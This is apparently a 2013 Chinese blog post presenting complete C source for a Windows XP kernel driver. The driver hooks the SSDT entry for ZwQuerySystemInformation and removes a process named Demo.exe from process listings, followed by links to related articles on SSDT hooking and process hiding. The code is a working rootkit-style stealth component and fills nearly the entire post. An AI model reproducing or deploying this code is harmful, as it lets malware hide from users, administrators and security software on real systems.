新版XP下Hook SSDT隐藏进程

原创 2013年12月01日 21:54:14
// 网上的代码里,很多函数都是很早之前的,像什么MmCreateMdlMmMapLockedPages啊,现在早已被废弃。所以想自己写个。蓝了几十次,OMG
// 隐藏名称为Demo.exe的进程
#ifdef __cplusplus
extern "C"
{
#endif

#include <ntddk.h>

#pragma pack(1)
typedef struct ServiceDescriptorEntry
{
    unsigned int *ServiceTableBase;
    unsigned int *ServiceCounterTableBase; //Used only in checked build
    unsigned int NumberOfServices;
    unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()

typedef struct _SYSTEM_PROCESS_INFORMATION
{
    ULONG NextEntryOffset;
    ULONG NumberOfThreads;
    LARGE_INTEGER SpareLi1;
    LARGE_INTEGER SpareLi2;
    LARGE_INTEGER SpareLi3;
    LARGE_INTEGER CreateTime;
    LARGE_INTEGER UserTime;
    LARGE_INTEGER KernelTime;
    UNICODE_STRING ImageName;
    KPRIORITY BasePriority;
    HANDLE UniqueProcessId;
    HANDLE InheritedFromUniqueProcessId;
    ULONG HandleCount;
    ULONG SessionId;
    ULONG_PTR PageDirectoryBase;
    SIZE_T PeakVirtualSize;
    SIZE_T VirtualSize;
    ULONG PageFaultCount;
    SIZE_T PeakWorkingSetSize;
    SIZE_T WorkingSetSize;
    SIZE_T QuotaPeakPagedPoolUsage;
    SIZE_T QuotaPagedPoolUsage;
    SIZE_T QuotaPeakNonPagedPoolUsage;
    SIZE_T QuotaNonPagedPoolUsage;
    SIZE_T PagefileUsage;
    SIZE_T PeakPagefileUsage;
    SIZE_T PrivatePageCount;
    LARGE_INTEGER ReadOperationCount;
    LARGE_INTEGER WriteOperationCount;
    LARGE_INTEGER OtherOperationCount;
    LARGE_INTEGER ReadTransferCount;
    LARGE_INTEGER WriteTransferCount;
    LARGE_INTEGER OtherTransferCount;
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;;

extern ServiceDescriptorTableEntry_t KeServiceDescriptorTable;
NTKERNELAPI NTSTATUS ZwQuerySystemInformation( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength );

typedef NTSTATUS( *ZWQUERYSYSTEMINFORMATION )( ULONG SystemInformationCLass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength );
ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;
PMDL  pMdlSSDT = NULL;
PVOID* pMapSSDT = NULL;

ULONG GetSysFuncIndex( ULONG pFunc )
{
    // 计算方法参考:http://blog.csdn.net/yjz1409276/article/details/17049417
    return *( PULONG )( ( PUCHAR )pFunc + 1 );
}

ULONG GetSysFuncAddr( ULONG pFunc )
{
    ULONG FuncIndex = GetSysFuncIndex( pFunc );
    return *( ( ( PULONG ) * KeServiceDescriptorTable.ServiceTableBase ) + FuncIndex );
}

ULONG HookSysFunc( ULONG pSysFunc, ULONG pNewFunc )
{
    KdPrint( ( "Enter HookSysFunc/n" ) );
    __try
    {
        PULONG pSysAddr = ( PULONG )( pMapSSDT ) + GetSysFuncIndex( pSysFunc );
        return InterlockedExchange( ( PLONG )pSysAddr , ( ULONG )pNewFunc );
    }
    __except ( EXCEPTION_EXECUTE_HANDLER )
    {
        KdPrint( ( "HookSysFunc Occurred Exception/n" ) );
    }
}

ULONG UnHookSysFunc( ULONG pSysFunc, ULONG pOldFunc )
{
    KdPrint( ( "Enter UnHookSysFunc/n" ) );
    __try
    {
        PULONG pSysAddr = ( PULONG )( pMapSSDT ) + GetSysFuncIndex( pSysFunc );
        return InterlockedExchange( ( PLONG )pSysAddr , ( ULONG ) pOldFunc );
    }
    __except ( EXCEPTION_EXECUTE_HANDLER )
    {
        KdPrint( ( "UnHookSysFunc Occurred Exception/n" ) );
    }
    return 0;
}

VOID DriverUnload( IN PDRIVER_OBJECT DriverObject )
{
    KdPrint( ( "Enter DriverUnload/n" ) );
    
    UnHookSysFunc( ( ULONG )ZwQuerySystemInformation, ( ULONG )OldZwQuerySystemInformation );
    
    if ( NULL != pMdlSSDT )
    {
        MmUnmapLockedPages( pMapSSDT, pMdlSSDT );
        IoFreeMdl( pMdlSSDT );
    }
}

NTSTATUS NewZwQuerySystemInformation( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength )
{
    KdPrint( ( "Enter NewZwQuerySystemInformation/n" ) );
    
    NTSTATUS ntStatus;
    
    ntStatus = ( ( ZWQUERYSYSTEMINFORMATION )( OldZwQuerySystemInformation ) )( SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength );
    
    if ( NT_SUCCESS( ntStatus ) )
    {
        if ( SystemInformationClass == 5 )
        {
            PSYSTEM_PROCESS_INFORMATION curr = ( PSYSTEM_PROCESS_INFORMATION )SystemInformation;
            PSYSTEM_PROCESS_INFORMATION prev = NULL;
            UNICODE_STRING hideName;
            RtlInitUnicodeString( &hideName, L"Demo.exe" );
            while ( curr )
            {
                if ( curr->ImageName.Buffer != NULL )
                {
                    if ( 0 == RtlCompareUnicodeString( &curr->ImageName, &hideName, FALSE ) )
                    {
                        if ( prev ) // Middle or Last entry
                        {
                            if ( curr->NextEntryOffset )
                                prev->NextEntryOffset += curr->NextEntryOffset;
                            else	// we are last, so make prev the end
                                prev->NextEntryOffset = 0;
                        }
                        else
                        {
                            if ( curr->NextEntryOffset )
                            {
                                // we are first in the list, so move it forward
                                SystemInformation = ( PCHAR )SystemInformation + curr->NextEntryOffset;
                            }
                            else // we are the only process!
                                SystemInformation = NULL;
                        }
                    }
                }
                prev = curr;
                if ( curr->NextEntryOffset )
                    ( curr = ( PSYSTEM_PROCESS_INFORMATION )( ( PCHAR )curr + curr->NextEntryOffset ) );
                else
                    curr = NULL;
            }
        }
    }
    return ntStatus;
}

NTSTATUS DefaultHandler( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp )
{
    KdPrint( ( "Enter DefaultHandler/n" ) );
    
    Irp->IoStatus.Status = STATUS_NOT_SUPPORTED;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest( Irp, IO_NO_INCREMENT );
    return Irp->IoStatus.Status;
}

NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING  RegistryPath )
{
    KdPrint( ( "Enter DriverEntry/n" ) );
    
    for ( int i = 0; i <= IRP_MJ_MAXIMUM_FUNCTION; i++ )
    {
        DriverObject->MajorFunction[i] = DefaultHandler;
    }
    
    DriverObject->DriverUnload  = DriverUnload;
    
    __try
    {
        OldZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetSysFuncAddr( ( ULONG )ZwQuerySystemInformation );
        pMdlSSDT = IoAllocateMdl( ( PULONG ) * KeServiceDescriptorTable.ServiceTableBase,
                                  KeServiceDescriptorTable.NumberOfServices * 4, FALSE, FALSE, NULL );
        if ( NULL == pMdlSSDT )
        {
            return STATUS_UNSUCCESSFUL;
        }
        MmBuildMdlForNonPagedPool( pMdlSSDT );
        pMdlSSDT->MdlFlags |= MDL_MAPPED_TO_SYSTEM_VA;
        pMapSSDT = ( PVOID* )MmMapLockedPagesSpecifyCache( pMdlSSDT, KernelMode, MmNonCached, NULL, FALSE, HighPagePriority );
        if ( NULL == pMapSSDT )
        {
            return STATUS_UNSUCCESSFUL;
        }
        
        HookSysFunc( ( ULONG )ZwQuerySystemInformation , ( ULONG )NewZwQuerySystemInformation );
        return STATUS_SUCCESS;
    }
    __except ( EXCEPTION_EXECUTE_HANDLER )
    {
    
    }
    return STATUS_UNSUCCESSFUL;
    
}

#ifdef __cplusplus
}
#endif


版权声明:本文为博主原创文章,未经博主允许不得转载。

相关文章推荐

进程隐藏与进程保护(SSDT Hook 实现)(一)

转载自  Zachary.XiaoZhen - 梦想的天空 进程隐藏与进程保护(SSDT Hook 实现)(一) 文章目录:           ...

进程隐藏与进程保护(SSDT Hook 实现)(一)

文章目录:                   1. 引子 – Hook 技术: 2. SSDT 简介:...

进程隐藏与进程保护(SSDT Hook 实现)(二)

Zachary.XiaoZhen - 梦想的天空 进程隐藏与进程保护(SSDT Hook 实现)(二) 文章目录:              ...

进程隐藏与进程保护(SSDT Hook 实现)(一)

转载自  Zachary.XiaoZhen - 梦想的天空 文章目录:                 ...

进程隐藏与进程保护(SSDT Hook 实现)(一)

文章目录:                   1. 引子 – Hook 技术: 2. SSDT 简介: 3. 应用层调...

进程隐藏与进程保护(SSDT Hook 实现)(一)

转载自  Zachary.XiaoZhen - 梦想的天空 lian

针对 NtOpenProcess服务函数HOOK SSDT示例代码,保护记事本进程

#include ////////////////////////////////////////////////////////////////////////// //函数声明 NTSTA...

SSDT HOOK禁止指定进程结束

经过两个星期的折腾,SSDT HOOK终于成功了,在这里首先感谢论坛里的一位大神,真的是非常感谢,他的ID是什么记不得了,加了他的好友,记得他的名字下面写着列宁两个字,呵呵很有趣的名字啊,想加的人可以...

最新隐藏进程 RING3实现方式:hook ZwQuerySystemInformation 隐藏进程 在XP里测试通过

研究其他作者写的文章,也是hook ZwQuerySystemInformation 隐藏进程,可是我怎么测试都没有通过,不能隐藏进程,在网上也试了其他隐藏进程的代码,也不行。唉,那就只有自己动手啦~...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)